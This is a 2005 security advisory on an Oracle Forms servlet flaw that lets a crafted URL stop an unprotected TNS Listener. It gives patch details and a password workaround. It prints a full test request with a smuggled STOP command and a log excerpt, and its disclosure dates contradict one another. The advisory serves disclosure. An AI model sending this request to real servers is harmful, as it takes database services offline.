Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company
|
Shutdown TNS Listener via Oracle Forms Servlet
Details The forms servlet can be used to stop the (unprotected) TNS Listener. Affected Products Oracle Forms Patch Information This bug is fixed with Critical Patch Update July 2005 (CPU July 2005). Oracle forgot to inform Red-Database-Security that this bug is fixed with CPU July 2005. Workaround Protect the TNS Listener with a password. Testcase http://server:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@ (DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521))) (CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER))) &buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES Excerpt from the listener.log: 28-OCT-2003 14:44:46 * (CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER) (CID=(PROGRAM=C:\oracle\oradev9i\bin\ifweb90.exe)(HOST=SERVER)(USER=Administrator))) * stop * 0 History 14-feb-2005 Oracle secalert was informed 15-feb-2003 Bug confirmed 18-oct-2005 Oracle published the Critical Patch Update October 2005 (CPU October 2005) 20-oct-2005 Red-Database-Security published this advisory © 2005 by Red-Database-Security GmbH - last update 03-nov-2005 |
Oracle Forms |